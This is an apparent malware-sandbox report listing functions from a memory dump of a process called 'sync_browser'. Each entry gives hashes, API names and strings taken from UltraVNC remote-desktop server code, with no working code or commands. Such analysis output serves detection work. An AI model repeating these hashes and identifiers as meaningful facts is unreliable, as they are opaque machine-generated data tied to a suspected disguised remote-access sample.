                                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                      • API String ID: 181403729-1081969236
                                                                      • Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                      • Instruction ID: 6a54c43896500749cb5cf8be16b5a7ad48e0a9a1e2f1a4adc99babe1cb083e9b
                                                                      • Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                      • Instruction Fuzzy Hash: 0B510762A195C995E725BB39B4707F8A390EB45B44FC4403BF94ECB695DE3CD10AC322
                                                                      Function 00007FF7E507B030 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                                      • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                                      • API String ID: 1123868200-453874877
                                                                      • Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                      • Instruction ID: a8518619b6fff72471bc123f4aebbf3201f67a1ecad52829d2c9ad9b0bdf6ae8
                                                                      • Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                      • Instruction Fuzzy Hash: 6F517125A0978A85EE11BB25E4603B9A790FF94F84F880037EA0D87795FF3CE445C762
                                                                      Function 00007FF7E5084970 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 77threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                                      • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                                      • API String ID: 1907048692-1814171851
                                                                      • Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                      • Instruction ID: 97d631a6bee099315ed845e96d8ab7bdd55de13b2d6b86ed22d3a37cd801dd0f
                                                                      • Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                      • Instruction Fuzzy Hash: A9310E21A08A8A91FA20EB25B8647F5A3A1FF88F45FC45037E94DC7658DF3CD505C762
                                                                      Function 00007FF7E50A5100 Relevance: 22.7, APIs: 15, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                                      • String ID:
                                                                      • API String ID: 1881577244-0
                                                                      • Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                      • Instruction ID: 2b59919685589e4a1810c468926351cff5f703af9f7b38813825684cb1874c7b
                                                                      • Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                      • Instruction Fuzzy Hash: A1A1E672A0868A4ADB20AF25E464B7AB751FB84F88F905136EE0ED3755EF3CD404C721
                                                                      Function 00007FF7E50800D0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                                      • String ID:
                                                                      • API String ID: 2677898628-0
                                                                      • Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                      • Instruction ID: 73f6a3cb7e7f7e309ad646d1b4ae38ba1431db8f1e945804d28d6da134045023
                                                                      • Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                      • Instruction Fuzzy Hash: 16418072B1491586FB10EB66E864AAD7330FB84F98B805132DF1E97B68DF38D445C310
                                                                      Function 00007FF7E509551D Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 293COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                                      • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 1769082246-4238595597
                                                                      • Opcode ID: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
                                                                      • Instruction ID: 2575b596ab24926460b2a5bd81e157ee6b73d2b74f8b31c8113b3addb85a0992
                                                                      • Opcode Fuzzy Hash: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
                                                                      • Instruction Fuzzy Hash: 68E1AF32A086C585E760AB39C4687FEB7A1FB85F94F854036EA4C877A9CF38D441C721
                                                                      Function 00007FF7E5095958 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Enter$Leave
                                                                      • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 2801635615-1537001432
                                                                      • Opcode ID: 0815a291423a4761241bbe2c4cff846dfa2ae7941a28891a62adbef60b9886ff
                                                                      • Instruction ID: 4e5db0700944667c31b96c9ef9f736e32465d5f31e65167ab444f0475ae47b45
                                                                      • Opcode Fuzzy Hash: 0815a291423a4761241bbe2c4cff846dfa2ae7941a28891a62adbef60b9886ff
                                                                      • Instruction Fuzzy Hash: 4FD1C422A086C585F750AB39C4687FEA7A0FBC5F94F854136EA4C877A9CF38D445C722
                                                                      Function 00007FF7E50C8080 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 85libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                      • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                      • API String ID: 1719662965-904825817
                                                                      • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                      • Instruction ID: cf40c82babf57ecda78fa6bc247ec75811cc2b4699aea66d63faf961f96f98af
                                                                      • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                      • Instruction Fuzzy Hash: 51416275A08A8A81F620BB25B8253B9A390FF49F90F844137DD5DC7799DE3CE105C722
                                                                      Function 00007FF7E50A11E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                      • String ID:
                                                                      • API String ID: 4219907860-0
                                                                      • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                      • Instruction ID: e226ce8c923ca4fe3b55afd6741a0a4b8193649f73e10a5117270fcc0607e85d
                                                                      • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                      • Instruction Fuzzy Hash: 5941653661868686E730AF25B8547AAB350FB88FD8F405536EE4E87B58EF7CD104C721
                                                                      Function 00007FF7E5081640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 132COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$FileModuleNameStringVersion
                                                                      • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                                      • API String ID: 769895750-1251308945
                                                                      • Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                      • Instruction ID: dcfe63d541996ed8849c4cc0a911d428d23c23ca88d102e3e19d2484c34059ca
                                                                      • Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                      • Instruction Fuzzy Hash: 3851B12560868A95E720AB34B4613A9B7A0FB44BB0F844337EA7D836D9DF3CD405C722
                                                                      Function 00007FF7E50A1AE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Free$AddressLoadProc
                                                                      • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                      • API String ID: 1386263645-671781545
                                                                      • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                      • Instruction ID: b37c97d9e61c3ccc9ef931f4fb3042b7c8ef67e7db60fdc8d4ea4743c0c5c4f4
                                                                      • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                      • Instruction Fuzzy Hash: 6B418F3190C60A85FB24BF34E475338A291EB45F69F904932E51D862D9EF7DE4448733
                                                                      Function 00007FF7E507B310 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                                      • API String ID: 3057866299-2798169553
                                                                      • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                      • Instruction ID: b0dc55c18b00ea0e0e33d37a821784f7c223563d2096b9f5c45102df980cfb80
                                                                      • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                      • Instruction Fuzzy Hash: E6319720A1964A91FD65BB29E4613B4D390EF54F44FC80437EA0DC62A5FF3CE894C362
                                                                      Function 00007FF7E5083A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 72registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$CreateOpenQueryValueVersion
